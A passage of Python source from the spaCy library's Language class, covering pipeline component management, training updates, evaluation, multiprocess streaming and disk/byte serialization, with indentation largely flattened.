from .gold import GoldParse
from .scorer import Scorer
from ._ml import link_vectors_to_models, create_default_optimizer
from .attrs import IS_STOP, LANG
from .lang.punctuation import TOKENIZER_PREFIXES, TOKENIZER_SUFFIXES
from .lang.punctuation import TOKENIZER_INFIXES
from .lang.tokenizer_exceptions import TOKEN_MATCH
from .lang.tag_map import TAG_MAP
from .tokens import Doc
from .lang.lex_attrs import LEX_ATTRS, is_stop
from .errors import Errors, Warnings, deprecation_warning, user_warning
from . import util
from . import about
class BaseDefaults(object):
@classmethod
def create_lemmatizer(cls, nlp=None, lookups=None):
if lookups is None:
lookups = cls.create_lookups(nlp=nlp)
return Lemmatizer(lookups=lookups)
@classmethod
def create_lookups(cls, nlp=None):
root = util.get_module_path(cls)
filenames = {name: root / filename for name, filename in cls.resources}
if LANG in cls.lex_attr_getters:
lang = cls.lex_attr_getters[LANG](None)
user_lookups = util.get_entry_point(util.ENTRY_POINTS.lookups, lang, {})
filenames.update(user_lookups)
lookups = Lookups()
for name, filename in filenames.items():
data = util.load_language_data(filename)
lookups.add_table(name, data)
return lookups
@classmethod
def create_vocab(cls, nlp=None):
lookups = cls.create_lookups(nlp)
lemmatizer = cls.create_lemmatizer(nlp, lookups=lookups)
lex_attr_getters = dict(cls.lex_attr_getters)
# This is messy, but it's the minimal working fix to Issue #639.
lex_attr_getters[IS_STOP] = functools.partial(is_stop, stops=cls.stop_words)
vocab = Vocab(
lex_attr_getters=lex_attr_getters,
tag_map=cls.tag_map,
lemmatizer=lemmatizer,
lookups=lookups,
)
for tag_str, exc in cls.morph_rules.items():
for orth_str, attrs in exc.items():
vocab.morphology.add_special_case(tag_str, orth_str, attrs)
return vocab
@classmethod
def create_tokenizer(cls, nlp=None):
rules = cls.tokenizer_exceptions
token_match = cls.token_match
prefix_search = (
util.compile_prefix_regex(cls.prefixes).search if cls.prefixes else None
)
suffix_search = (
util.compile_suffix_regex(cls.suffixes).search if cls.suffixes else None
)
infix_finditer = (
util.compile_infix_regex(cls.infixes).finditer if cls.infixes else None
)
vocab = nlp.vocab if nlp is not None else cls.create_vocab(nlp)
return Tokenizer(
vocab,
rules=rules,
prefix_search=prefix_search,
suffix_search=suffix_search,
infix_finditer=infix_finditer,
token_match=token_match,
)
pipe_names = ["tagger", "parser", "ner"]
token_match = TOKEN_MATCH
prefixes = tuple(TOKENIZER_PREFIXES)
suffixes = tuple(TOKENIZER_SUFFIXES)
infixes = tuple(TOKENIZER_INFIXES)
tag_map = dict(TAG_MAP)
tokenizer_exceptions = {}
stop_words = set()
lemma_rules = {}
lemma_exc = {}
lemma_index = {}
lemma_lookup = {}
morph_rules = {}
lex_attr_getters = LEX_ATTRS
syntax_iterators = {}
resources = {}
writing_system = {"direction": "ltr", "has_case": True, "has_letters": True}
single_orth_variants = []
paired_orth_variants = []
class Language(object):
"""A text-processing pipeline. Usually you'll load this once per process,
and pass the instance around your application.
Defaults (class): Settings, data and factory methods for creating the `nlp`
object and processing pipeline.
lang (unicode): Two-letter language ID, i.e. ISO code.
DOCS: https://spacy.io/api/language
"""
Defaults = BaseDefaults
lang = None
factories = {
"tokenizer": lambda nlp: nlp.Defaults.create_tokenizer(nlp),
"tensorizer": lambda nlp, **cfg: Tensorizer(nlp.vocab, **cfg),
"tagger": lambda nlp, **cfg: Tagger(nlp.vocab, **cfg),
"morphologizer": lambda nlp, **cfg: Morphologizer(nlp.vocab, **cfg),
"parser": lambda nlp, **cfg: DependencyParser(nlp.vocab, **cfg),
"ner": lambda nlp, **cfg: EntityRecognizer(nlp.vocab, **cfg),
"entity_linker": lambda nlp, **cfg: EntityLinker(nlp.vocab, **cfg),
"similarity": lambda nlp, **cfg: SimilarityHook(nlp.vocab, **cfg),
"textcat": lambda nlp, **cfg: TextCategorizer(nlp.vocab, **cfg),
"sentencizer": lambda nlp, **cfg: Sentencizer(**cfg),
"merge_noun_chunks": lambda nlp, **cfg: merge_noun_chunks,
"merge_entities": lambda nlp, **cfg: merge_entities,
"merge_subtokens": lambda nlp, **cfg: merge_subtokens,
"entity_ruler": lambda nlp, **cfg: EntityRuler(nlp, **cfg),
}
def __init__(
self, vocab=True, make_doc=True, max_length=10 ** 6, meta={}, **kwargs
):
"""Initialise a Language object.
vocab (Vocab): A `Vocab` object. If `True`, a vocab is created via
`Language.Defaults.create_vocab`.
make_doc (callable): A function that takes text and returns a `Doc`
object. Usually a `Tokenizer`.
meta (dict): Custom meta data for the Language class. Is written to by
models to add model meta data.
max_length (int) :
Maximum number of characters in a single text. The current v2 models
may run out of memory on extremely long texts, due to large internal
allocations. You should segment these texts into meaningful units,
e.g. paragraphs, subsections etc., before passing them to spaCy.
The default maximum length is 1,000,000 characters (1 MB). As a rule of
thumb, if all pipeline components are enabled, spaCy's default
models currently require roughly 1GB of temporary memory per
100,000 characters in one text.
RETURNS (Language): The newly constructed object.
"""
user_factories = util.get_entry_points(util.ENTRY_POINTS.factories)
self.factories.update(user_factories)
self._meta = dict(meta)
self._path = None
if vocab is True:
factory = self.Defaults.create_vocab
vocab = factory(self, **meta.get("vocab", {}))
if vocab.vectors.name is None:
vocab.vectors.name = meta.get("vectors", {}).get("name")
else:
if (self.lang and vocab.lang) and (self.lang != vocab.lang):
raise ValueError(Errors.E150.format(nlp=self.lang, vocab=vocab.lang))
self.vocab = vocab
if make_doc is True:
factory = self.Defaults.create_tokenizer
make_doc = factory(self, **meta.get("tokenizer", {}))
self.tokenizer = make_doc
self.pipeline = []
self.max_length = max_length
self._optimizer = None
@property
def path(self):
return self._path
@property
def meta(self):
if self.vocab.lang:
self._meta.setdefault("lang", self.vocab.lang)
else:
self._meta.setdefault("lang", self.lang)
self._meta.setdefault("name", "model")
self._meta.setdefault("version", "0.0.0")
self._meta.setdefault("spacy_version", ">={}".format(about.__version__))
self._meta.setdefault("description", "")
self._meta.setdefault("author", "")
self._meta.setdefault("email", "")
self._meta.setdefault("url", "")
self._meta.setdefault("license", "")
self._meta["vectors"] = {
"width": self.vocab.vectors_length,
"vectors": len(self.vocab.vectors),
"keys": self.vocab.vectors.n_keys,
"name": self.vocab.vectors.name,
}
self._meta["pipeline"] = self.pipe_names
self._meta["labels"] = self.pipe_labels
return self._meta
@meta.setter
def meta(self, value):
self._meta = value
# Conveniences to access pipeline components
# Shouldn't be used anymore!
@property
def tensorizer(self):
return self.get_pipe("tensorizer")
@property
def tagger(self):
return self.get_pipe("tagger")
@property
def parser(self):
return self.get_pipe("parser")
@property
def entity(self):
return self.get_pipe("ner")
@property
def linker(self):
return self.get_pipe("entity_linker")
@property
def matcher(self):
return self.get_pipe("matcher")
@property
def pipe_names(self):
"""Get names of available pipeline components.
RETURNS (list): List of component name strings, in order.
"""
return [pipe_name for pipe_name, _ in self.pipeline]
@property
def pipe_labels(self):
"""Get the labels set by the pipeline components, if available (if
the component exposes a labels property).
RETURNS (dict): Labels keyed by component name.
"""
labels = OrderedDict()
for name, pipe in self.pipeline:
if hasattr(pipe, "labels"):
labels[name] = list(pipe.labels)
return labels
def get_pipe(self, name):
"""Get a pipeline component for a given component name.
name (unicode): Name of pipeline component to get.
RETURNS (callable): The pipeline component.
DOCS: https://spacy.io/api/language#get_pipe
"""
for pipe_name, component in self.pipeline:
if pipe_name == name:
return component
raise KeyError(Errors.E001.format(name=name, opts=self.pipe_names))
def create_pipe(self, name, config=dict()):
"""Create a pipeline component from a factory.
name (unicode): Factory name to look up in `Language.factories`.
config (dict): Configuration parameters to initialise component.
RETURNS (callable): Pipeline component.
DOCS: https://spacy.io/api/language#create_pipe
"""
if name not in self.factories:
if name == "sbd":
raise KeyError(Errors.E108.format(name=name))
else:
raise KeyError(Errors.E002.format(name=name))
factory = self.factories[name]
return factory(self, **config)
def add_pipe(
self, component, name=None, before=None, after=None, first=None, last=None
):
"""Add a component to the processing pipeline. Valid components are
callables that take a `Doc` object, modify it and return it. Only one
of before/after/first/last can be set. Default behaviour is "last".
component (callable): The pipeline component.
name (unicode): Name of pipeline component. Overwrites existing
component.name attribute if available. If no name is set and
the component exposes no name attribute, component.__name__ is
used. An error is raised if a name already exists in the pipeline.
before (unicode): Component name to insert component directly before.
after (unicode): Component name to insert component directly after.
first (bool): Insert component first / not first in the pipeline.
last (bool): Insert component last / not last in the pipeline.
DOCS: https://spacy.io/api/language#add_pipe
"""
if not hasattr(component, "__call__"):
msg = Errors.E003.format(component=repr(component), name=name)
if isinstance(component, basestring_) and component in self.factories:
msg += Errors.E004.format(component=component)
raise ValueError(msg)
if name is None:
if hasattr(component, "name"):
name = component.name
elif hasattr(component, "__name__"):
name = component.__name__
elif hasattr(component, "__class__") and hasattr(
component.__class__, "__name__"
):
name = component.__class__.__name__
else:
name = repr(component)
if name in self.pipe_names:
raise ValueError(Errors.E007.format(name=name, opts=self.pipe_names))
if sum([bool(before), bool(after), bool(first), bool(last)]) >= 2:
raise ValueError(Errors.E006)
pipe = (name, component)
if last or not any([first, before, after]):
self.pipeline.append(pipe)
elif first:
self.pipeline.insert(0, pipe)
elif before and before in self.pipe_names:
self.pipeline.insert(self.pipe_names.index(before), pipe)
elif after and after in self.pipe_names:
self.pipeline.insert(self.pipe_names.index(after) + 1, pipe)
else:
raise ValueError(
Errors.E001.format(name=before or after, opts=self.pipe_names)
)
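# A minimal usage sketch for `add_pipe` (assumes an existing `nlp` object; the
# component below is illustrative only):
#
#   def length_logger(doc):
#       print("doc length:", len(doc))
#       return doc
#
#   nlp.add_pipe(length_logger, name="length_logger", last=True)
#   assert "length_logger" in nlp.pipe_names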
def has_pipe(self, name):
"""Check if a component name is present in the pipeline. Equivalent to
`name in nlp.pipe_names`.
name (unicode): Name of the component.
RETURNS (bool): Whether a component of the name exists in the pipeline.
DOCS: https://spacy.io/api/language#has_pipe
"""
return name in self.pipe_names
def replace_pipe(self, name, component):
"""Replace a component in the pipeline.
name (unicode): Name of the component to replace.
component (callable): Pipeline component.
DOCS: https://spacy.io/api/language#replace_pipe
"""
if name not in self.pipe_names:
raise ValueError(Errors.E001.format(name=name, opts=self.pipe_names))
if not hasattr(component, "__call__"):
msg = Errors.E003.format(component=repr(component), name=name)
if isinstance(component, basestring_) and component in self.factories:
msg += Errors.E135.format(name=name)
raise ValueError(msg)
self.pipeline[self.pipe_names.index(name)] = (name, component)
def rename_pipe(self, old_name, new_name):
"""Rename a pipeline component.
old_name (unicode): Name of the component to rename.
new_name (unicode): New name of the component.
DOCS: https://spacy.io/api/language#rename_pipe
"""
if old_name not in self.pipe_names:
raise ValueError(Errors.E001.format(name=old_name, opts=self.pipe_names))
if new_name in self.pipe_names:
raise ValueError(Errors.E007.format(name=new_name, opts=self.pipe_names))
i = self.pipe_names.index(old_name)
self.pipeline[i] = (new_name, self.pipeline[i][1])
def remove_pipe(self, name):
"""Remove a component from the pipeline.
name (unicode): Name of the component to remove.
RETURNS (tuple): A `(name, component)` tuple of the removed component.
DOCS: https://spacy.io/api/language#remove_pipe
"""
if name not in self.pipe_names:
raise ValueError(Errors.E001.format(name=name, opts=self.pipe_names))
return self.pipeline.pop(self.pipe_names.index(name))
def __call__(self, text, disable=[], component_cfg=None):
"""Apply the pipeline to some text. The text can span multiple sentences,
and can contain arbitrary whitespace. Alignment into the original string
is preserved.
text (unicode): The text to be processed.
disable (list): Names of the pipeline components to disable.
component_cfg (dict): An optional dictionary with extra keyword arguments
for specific components.
RETURNS (Doc): A container for accessing the annotations.
DOCS: https://spacy.io/api/language#call
"""
if len(text) > self.max_length:
raise ValueError(
Errors.E088.format(length=len(text), max_length=self.max_length)
)
doc = self.make_doc(text)
if component_cfg is None:
component_cfg = {}
for name, proc in self.pipeline:
if name in disable:
continue
if not hasattr(proc, "__call__"):
raise ValueError(Errors.E003.format(component=type(proc), name=name))
doc = proc(doc, **component_cfg.get(name, {}))
if doc is None:
raise ValueError(Errors.E005.format(name=name))
return doc
def disable_pipes(self, *names):
"""Disable one or more pipeline components. If used as a context
manager, the pipeline will be restored to the initial state at the end
of the block. Otherwise, a DisabledPipes object is returned, that has
a `.restore()` method you can use to undo your changes.
DOCS: https://spacy.io/api/language#disable_pipes
"""
return DisabledPipes(self, *names)
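# A usage sketch, as described in the docstring above (assumes an `nlp` object whose
# pipeline contains "tagger", "parser" and "ner"):
#
#   with nlp.disable_pipes("tagger", "parser"):
#       doc = nlp("Only the remaining components run inside this block.")
#   # the pipeline is restored when the block exits
#
#   disabled = nlp.disable_pipes("ner")   # without a `with` block ...
#   disabled.restore()                    # ... restore explicitly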
def make_doc(self, text):
return self.tokenizer(text)
def _format_docs_and_golds(self, docs, golds):
"""Format golds and docs before update models."""
expected_keys = ("words", "tags", "heads", "deps", "entities", "cats", "links")
gold_objs = []
doc_objs = []
for doc, gold in zip(docs, golds):
if isinstance(doc, basestring_):
doc = self.make_doc(doc)
if not isinstance(gold, GoldParse):
unexpected = [k for k in gold if k not in expected_keys]
if unexpected:
err = Errors.E151.format(unexp=unexpected, exp=expected_keys)
raise ValueError(err)
gold = GoldParse(doc, **gold)
doc_objs.append(doc)
gold_objs.append(gold)
return doc_objs, gold_objs
def update(self, docs, golds, drop=0.0, sgd=None, losses=None, component_cfg=None):
"""Update the models in the pipeline.
docs (iterable): A batch of `Doc` objects.
golds (iterable): A batch of `GoldParse` objects.
drop (float): The dropout rate.
sgd (callable): An optimizer.
losses (dict): Dictionary to update with the loss, keyed by component.
component_cfg (dict): Config parameters for specific pipeline
components, keyed by component name.
DOCS: https://spacy.io/api/language#update
"""
if len(docs) != len(golds):
raise IndexError(Errors.E009.format(n_docs=len(docs), n_golds=len(golds)))
if len(docs) == 0:
return
if sgd is None:
if self._optimizer is None:
self._optimizer = create_default_optimizer(Model.ops)
sgd = self._optimizer
# Allow dict of args to GoldParse, instead of GoldParse objects.
docs, golds = self._format_docs_and_golds(docs, golds)
grads = {}
def get_grads(W, dW, key=None):
grads[key] = (W, dW)
get_grads.alpha = sgd.alpha
get_grads.b1 = sgd.b1
get_grads.b2 = sgd.b2
pipes = list(self.pipeline)
random.shuffle(pipes)
if component_cfg is None:
component_cfg = {}
for name, proc in pipes:
if not hasattr(proc, "update"):
continue
grads = {}
kwargs = component_cfg.get(name, {})
kwargs.setdefault("drop", drop)
proc.update(docs, golds, sgd=get_grads, losses=losses, **kwargs)
for key, (W, dW) in grads.items():
sgd(W, dW, key=key)
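# A minimal training-loop sketch built on `update` (TRAIN_DATA, the epoch count and
# batch size are illustrative; see the spaCy training docs for full recipes):
#
#   optimizer = nlp.begin_training()
#   for epoch in range(10):
#       random.shuffle(TRAIN_DATA)              # list of (text, annotations) pairs
#       losses = {}
#       for batch in minibatch(TRAIN_DATA, size=8):
#           texts, annotations = zip(*batch)
#           nlp.update(texts, annotations, drop=0.2, sgd=optimizer, losses=losses)
#       print(epoch, losses)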
def rehearse(self, docs, sgd=None, losses=None, config=None):
"""Make a "rehearsal" update to the models in the pipeline, to prevent
forgetting. Rehearsal updates run an initial copy of the model over some
data, and update the model so its current predictions are more like the
initial ones. This is useful for keeping a pretrained model on-track,
even if you're updating it with a smaller set of examples.
docs (iterable): A batch of `Doc` objects.
drop (float): The dropout rate.
sgd (callable): An optimizer.
RETURNS (dict): Results from the update.
EXAMPLE:
>>> raw_text_batches = minibatch(raw_texts)
>>> for labelled_batch in minibatch(zip(train_docs, train_golds)):
>>> docs, golds = zip(*labelled_batch)
>>> nlp.update(docs, golds)
>>> raw_batch = [nlp.make_doc(text) for text in next(raw_text_batches)]
>>> nlp.rehearse(raw_batch)
"""
# TODO: document
if len(docs) == 0:
return
if sgd is None:
if self._optimizer is None:
self._optimizer = create_default_optimizer(Model.ops)
sgd = self._optimizer
docs = list(docs)
for i, doc in enumerate(docs):
if isinstance(doc, basestring_):
docs[i] = self.make_doc(doc)
pipes = list(self.pipeline)
random.shuffle(pipes)
if config is None:
config = {}
grads = {}
def get_grads(W, dW, key=None):
grads[key] = (W, dW)
get_grads.alpha = sgd.alpha
get_grads.b1 = sgd.b1
get_grads.b2 = sgd.b2
for name, proc in pipes:
if not hasattr(proc, "rehearse"):
continue
grads = {}
proc.rehearse(docs, sgd=get_grads, losses=losses, **config.get(name, {}))
for key, (W, dW) in grads.items():
sgd(W, dW, key=key)
return losses
def preprocess_gold(self, docs_golds):
"""Can be called before training to pre-process gold data. By default,
it handles nonprojectivity and adds missing tags to the tag map.
docs_golds (iterable): Tuples of `Doc` and `GoldParse` objects.
YIELDS (tuple): Tuples of preprocessed `Doc` and `GoldParse` objects.
"""
for name, proc in self.pipeline:
if hasattr(proc, "preprocess_gold"):
docs_golds = proc.preprocess_gold(docs_golds)
for doc, gold in docs_golds:
yield doc, gold
def begin_training(self, get_gold_tuples=None, sgd=None, component_cfg=None, **cfg):
"""Allocate models, pre-process training data and acquire a trainer and
optimizer. Used as a contextmanager.
get_gold_tuples (function): Function returning gold data
component_cfg (dict): Config parameters for specific components.
**cfg: Config parameters.
RETURNS: An optimizer.
DOCS: https://spacy.io/api/language#begin_training
"""
if get_gold_tuples is None:
get_gold_tuples = lambda: []
# Populate vocab
else:
for _, annots_brackets in get_gold_tuples():
_ = annots_brackets.pop()
for annots, _ in annots_brackets:
for word in annots[1]:
_ = self.vocab[word] # noqa: F841
if cfg.get("device", -1) >= 0:
util.use_gpu(cfg["device"])
if self.vocab.vectors.data.shape[1] >= 1:
self.vocab.vectors.data = Model.ops.asarray(self.vocab.vectors.data)
link_vectors_to_models(self.vocab)
if self.vocab.vectors.data.shape[1]:
cfg["pretrained_vectors"] = self.vocab.vectors.name
if sgd is None:
sgd = create_default_optimizer(Model.ops)
self._optimizer = sgd
if component_cfg is None:
component_cfg = {}
for name, proc in self.pipeline:
if hasattr(proc, "begin_training"):
kwargs = component_cfg.get(name, {})
kwargs.update(cfg)
proc.begin_training(
get_gold_tuples,
pipeline=self.pipeline,
sgd=self._optimizer,
**kwargs
)
return self._optimizer
def resume_training(self, sgd=None, **cfg):
"""Continue training a pretrained model.
Create and return an optimizer, and initialize "rehearsal" for any pipeline
component that has a .rehearse() method. Rehearsal is used to prevent
models from "forgetting" their initialised "knowledge". To perform
rehearsal, collect samples of text you want the models to retain performance
on, and call nlp.rehearse() with a batch of Doc objects.
"""
if cfg.get("device", -1) >= 0:
util.use_gpu(cfg["device"])
if self.vocab.vectors.data.shape[1] >= 1:
self.vocab.vectors.data = Model.ops.asarray(self.vocab.vectors.data)
link_vectors_to_models(self.vocab)
if self.vocab.vectors.data.shape[1]:
cfg["pretrained_vectors"] = self.vocab.vectors.name
if sgd is None:
sgd = create_default_optimizer(Model.ops)
self._optimizer = sgd
for name, proc in self.pipeline:
if hasattr(proc, "_rehearsal_model"):
proc._rehearsal_model = deepcopy(proc.model)
return self._optimizer
def evaluate(
self, docs_golds, verbose=False, batch_size=256, scorer=None, component_cfg=None
):
"""Evaluate a model's pipeline components.
docs_golds (iterable): Tuples of `Doc` and `GoldParse` objects.
verbose (bool): Print debugging information.
batch_size (int): Batch size to use.
scorer (Scorer): Optional `Scorer` to use. If not passed in, a new one
will be created.
component_cfg (dict): An optional dictionary with extra keyword
arguments for specific components.
RETURNS (Scorer): The scorer containing the evaluation results.
DOCS: https://spacy.io/api/language#evaluate
"""
if scorer is None:
scorer = Scorer(pipeline=self.pipeline)
if component_cfg is None:
component_cfg = {}
docs, golds = zip(*docs_golds)
docs = [
self.make_doc(doc) if isinstance(doc, basestring_) else doc for doc in docs
]
golds = list(golds)
for name, pipe in self.pipeline:
kwargs = component_cfg.get(name, {})
kwargs.setdefault("batch_size", batch_size)
if not hasattr(pipe, "pipe"):
docs = _pipe(pipe, docs, kwargs)
else:
docs = pipe.pipe(docs, **kwargs)
for doc, gold in zip(docs, golds):
if not isinstance(gold, GoldParse):
gold = GoldParse(doc, **gold)
if verbose:
print(doc)
kwargs = component_cfg.get("scorer", {})
kwargs.setdefault("verbose", verbose)
scorer.score(doc, gold, **kwargs)
return scorer
@contextmanager
def use_params(self, params, **cfg):
"""Replace weights of models in the pipeline with those provided in the
params dictionary. Can be used as a contextmanager, in which case,
models go back to their original weights after the block.
params (dict): A dictionary of parameters keyed by model ID.
**cfg: Config parameters.
EXAMPLE:
>>> with nlp.use_params(optimizer.averages):
>>> nlp.to_disk('/tmp/checkpoint')
"""
contexts = [
pipe.use_params(params)
for name, pipe in self.pipeline
if hasattr(pipe, "use_params")
]
# TODO: Having trouble with contextlib
# Workaround: these aren't actually context managers atm.
for context in contexts:
try:
next(context)
except StopIteration:
pass
yield
for context in contexts:
try:
next(context)
except StopIteration:
pass
def pipe(
self,
texts,
as_tuples=False,
n_threads=-1,
batch_size=1000,
disable=[],
cleanup=False,
component_cfg=None,
n_process=1,
):
"""Process texts as a stream, and yield `Doc` objects in order.
texts (iterator): A sequence of texts to process.
as_tuples (bool): If set to True, inputs should be a sequence of
(text, context) tuples. Output will then be a sequence of
(doc, context) tuples. Defaults to False.
batch_size (int): The number of texts to buffer.
disable (list): Names of the pipeline components to disable.
cleanup (bool): If True, unneeded strings are freed to control memory
use. Experimental.
component_cfg (dict): An optional dictionary with extra keyword
arguments for specific components.
n_process (int): Number of processors to process texts, only supported
in Python3. If -1, set `multiprocessing.cpu_count()`.
YIELDS (Doc): Documents in the order of the original text.
DOCS: https://spacy.io/api/language#pipe
"""
# raw_texts will be used later to stop iterator.
texts, raw_texts = itertools.tee(texts)
if is_python2 and n_process != 1:
user_warning(Warnings.W023)
n_process = 1
if n_threads != -1:
deprecation_warning(Warnings.W016)
if n_process == -1:
n_process = mp.cpu_count()
if as_tuples:
text_context1, text_context2 = itertools.tee(texts)
texts = (tc[0] for tc in text_context1)
contexts = (tc[1] for tc in text_context2)
docs = self.pipe(
texts,
batch_size=batch_size,
disable=disable,
component_cfg=component_cfg,
)
for doc, context in izip(docs, contexts):
yield (doc, context)
return
if component_cfg is None:
component_cfg = {}
pipes = []  # holds functools.partial objects so that multiprocessing workers can be created easily
for name, proc in self.pipeline:
if name in disable:
continue
kwargs = component_cfg.get(name, {})
# Allow component_cfg to overwrite the top-level kwargs.
kwargs.setdefault("batch_size", batch_size)
if hasattr(proc, "pipe"):
f = functools.partial(proc.pipe, **kwargs)
else:
# Apply the function, but yield the doc
f = functools.partial(_pipe, proc=proc, kwargs=kwargs)
pipes.append(f)
if n_process != 1:
docs = self._multiprocessing_pipe(texts, pipes, n_process, batch_size)
else:
# if n_process == 1, no processes are forked.
docs = (self.make_doc(text) for text in texts)
for pipe in pipes:
docs = pipe(docs)
# Track weakrefs of "recent" documents, so that we can see when they
# expire from memory. When they do, we know we don't need old strings.
# This way, we avoid maintaining an unbounded growth in string entries
# in the string store.
recent_refs = weakref.WeakSet()
old_refs = weakref.WeakSet()
# Keep track of the original string data, so that if we flush old strings,
# we can recover the original ones. However, we only want to do this if we're
# really adding strings, to save up-front costs.
original_strings_data = None
nr_seen = 0
for doc in docs:
yield doc
if cleanup:
recent_refs.add(doc)
if nr_seen < 10000:
old_refs.add(doc)
nr_seen += 1
elif len(old_refs) == 0:
old_refs, recent_refs = recent_refs, old_refs
if original_strings_data is None:
original_strings_data = list(self.vocab.strings)
else:
keys, strings = self.vocab.strings._cleanup_stale_strings(
original_strings_data
)
self.vocab._reset_cache(keys, strings)
self.tokenizer._reset_cache(keys)
nr_seen = 0
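# A typical streaming usage sketch for `pipe` (the texts below are placeholders):
#
#   texts = ["First document.", "Second document.", "Third document."]
#   for doc in nlp.pipe(texts, batch_size=50, disable=["parser"]):
#       print([(ent.text, ent.label_) for ent in doc.ents])
#
#   # with a context object attached to each text:
#   data = [("A text.", {"id": 1}), ("Another text.", {"id": 2})]
#   for doc, context in nlp.pipe(data, as_tuples=True):
#       print(context["id"], len(doc))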
def _multiprocessing_pipe(self, texts, pipes, n_process, batch_size):
# raw_texts is used later to stop iteration.
texts, raw_texts = itertools.tee(texts)
# for sending texts to worker
texts_q = [mp.Queue() for _ in range(n_process)]
# for receiving byte encoded docs from worker
bytedocs_recv_ch, bytedocs_send_ch = zip(
*[mp.Pipe(False) for _ in range(n_process)]
)
batch_texts = minibatch(texts, batch_size)
# Sender sends texts to the workers.
# This is necessary to properly handle texts of unbounded length
# (in that case, not all of the data can be sent to the workers at once).
sender = _Sender(batch_texts, texts_q, chunk_size=n_process)
# Send twice up front so that the worker processes are kept busy.
sender.send()
sender.send()
procs = [
mp.Process(target=_apply_pipes, args=(self.make_doc, pipes, rch, sch))
for rch, sch in zip(texts_q, bytedocs_send_ch)
]
for proc in procs:
proc.start()
# Cycle through the channels so that the order of docs is preserved.
# Each received object is a batch of byte-encoded docs, so flatten them with chain.from_iterable.
byte_docs = chain.from_iterable(recv.recv() for recv in cycle(bytedocs_recv_ch))
docs = (Doc(self.vocab).from_bytes(byte_doc) for byte_doc in byte_docs)
try:
for i, (_, doc) in enumerate(zip(raw_texts, docs), 1):
yield doc
if i % batch_size == 0:
# tell `sender` that one batch was consumed.
sender.step()
finally:
for proc in procs:
proc.terminate()
def to_disk(self, path, exclude=tuple(), disable=None):
"""Save the current state to a directory. If a model is loaded, this
will include the model.
path (unicode or Path): Path to a directory, which will be created if
it doesn't exist.
exclude (list): Names of components or serialization fields to exclude.
DOCS: https://spacy.io/api/language#to_disk
"""
if disable is not None:
deprecation_warning(Warnings.W014)
exclude = disable
path = util.ensure_path(path)
serializers = OrderedDict()
serializers["tokenizer"] = lambda p: self.tokenizer.to_disk(
p, exclude=["vocab"]
)
serializers["meta.json"] = lambda p: p.open("w").write(
srsly.json_dumps(self.meta)
)
for name, proc in self.pipeline:
if not hasattr(proc, "name"):
continue
if name in exclude:
continue
if not hasattr(proc, "to_disk"):
continue
serializers[name] = lambda p, proc=proc: proc.to_disk(p, exclude=["vocab"])
serializers["vocab"] = lambda p: self.vocab.to_disk(p)
util.to_disk(path, serializers, exclude)
def from_disk(self, path, exclude=tuple(), disable=None):
"""Loads state from a directory. Modifies the object in place and
returns it. If the saved `Language` object contains a model, the
model will be loaded.
path (unicode or Path): A path to a directory.
exclude (list): Names of components or serialization fields to exclude.
RETURNS (Language): The modified `Language` object.
DOCS: https://spacy.io/api/language#from_disk
"""
if disable is not None:
deprecation_warning(Warnings.W014)
exclude = disable
path = util.ensure_path(path)
deserializers = OrderedDict()
deserializers["meta.json"] = lambda p: self.meta.update(srsly.read_json(p))
deserializers["vocab"] = lambda p: self.vocab.from_disk(
p
) and _fix_pretrained_vectors_name(self)
deserializers["tokenizer"] = lambda p: self.tokenizer.from_disk(
p, exclude=["vocab"]
)
for name, proc in self.pipeline:
if name in exclude:
continue
if not hasattr(proc, "from_disk"):
continue
deserializers[name] = lambda p, proc=proc: proc.from_disk(
p, exclude=["vocab"]
)
if not (path / "vocab").exists() and "vocab" not in exclude:
# Convert to list here in case exclude is (default) tuple
exclude = list(exclude) + ["vocab"]
util.from_disk(path, deserializers, exclude)
self._path = path
return self
def to_bytes(self, exclude=tuple(), disable=None, **kwargs):
"""Serialize the current state to a binary string.
exclude (list): Names of components or serialization fields to exclude.
RETURNS (bytes): The serialized form of the `Language` object.
DOCS: https://spacy.io/api/language#to_bytes
"""
if disable is not None:
deprecation_warning(Warnings.W014)
exclude = disable
serializers = OrderedDict()
serializers["vocab"] = lambda: self.vocab.to_bytes()
serializers["tokenizer"] = lambda: self.tokenizer.to_bytes(exclude=["vocab"])
serializers["meta.json"] = lambda: srsly.json_dumps(self.meta)
for name, proc in self.pipeline:
if name in exclude:
continue
if not hasattr(proc, "to_bytes"):
continue
serializers[name] = lambda proc=proc: proc.to_bytes(exclude=["vocab"])
exclude = util.get_serialization_exclude(serializers, exclude, kwargs)
return util.to_bytes(serializers, exclude)
def from_bytes(self, bytes_data, exclude=tuple(), disable=None, **kwargs):
"""Load state from a binary string.
bytes_data (bytes): The data to load from.
exclude (list): Names of components or serialization fields to exclude.
RETURNS (Language): The `Language` object.
DOCS: https://spacy.io/api/language#from_bytes
"""
if disable is not None:
deprecation_warning(Warnings.W014)
exclude = disable
deserializers = OrderedDict()
deserializers["meta.json"] = lambda b: self.meta.update(srsly.json_loads(b))
deserializers["vocab"] = lambda b: self.vocab.from_bytes(
b
) and _fix_pretrained_vectors_name(self)
deserializers["tokenizer"] = lambda b: self.tokenizer.from_bytes(
b, exclude=["vocab"]
)
for name, proc in self.pipeline:
if name in exclude:
continue
if not hasattr(proc, "from_bytes"):
continue
deserializers[name] = lambda b, proc=proc: proc.from_bytes(
b, exclude=["vocab"]
)
exclude = util.get_serialization_exclude(deserializers, exclude, kwargs)
util.from_bytes(bytes_data, deserializers, exclude)
return self
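# The four methods above form the serialization API: `to_disk`/`from_disk` work
# with directories, while `to_bytes`/`from_bytes` work with in-memory blobs.
# A minimal round-trip sketch, assuming spaCy is installed and importable; the
# helper below is illustrative only and not part of this module:
def _example_serialization_roundtrip(model_dir="/tmp/example_nlp"):
    import spacy

    nlp = spacy.blank("en")                 # start from a blank English pipeline
    nlp.to_disk(model_dir)                  # writes tokenizer, vocab, meta.json, ...
    nlp_from_disk = spacy.blank("en").from_disk(model_dir)
    nlp_bytes = nlp.to_bytes()              # same state as a single bytes blob
    nlp_from_bytes = spacy.blank("en").from_bytes(nlp_bytes)
    return nlp_from_disk, nlp_from_bytes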
def _fix_pretrained_vectors_name(nlp):
# TODO: Replace this once we handle vectors consistently as static
# data
if "vectors" in nlp.meta and nlp.meta["vectors"].get("name"):
nlp.vocab.vectors.name = nlp.meta["vectors"]["name"]
elif not nlp.vocab.vectors.size:
nlp.vocab.vectors.name = None
elif "name" in nlp.meta and "lang" in nlp.meta:
vectors_name = "%s_%s.vectors" % (nlp.meta["lang"], nlp.meta["name"])
nlp.vocab.vectors.name = vectors_name
else:
raise ValueError(Errors.E092)
if nlp.vocab.vectors.size != 0:
link_vectors_to_models(nlp.vocab)
for name, proc in nlp.pipeline:
if not hasattr(proc, "cfg"):
continue
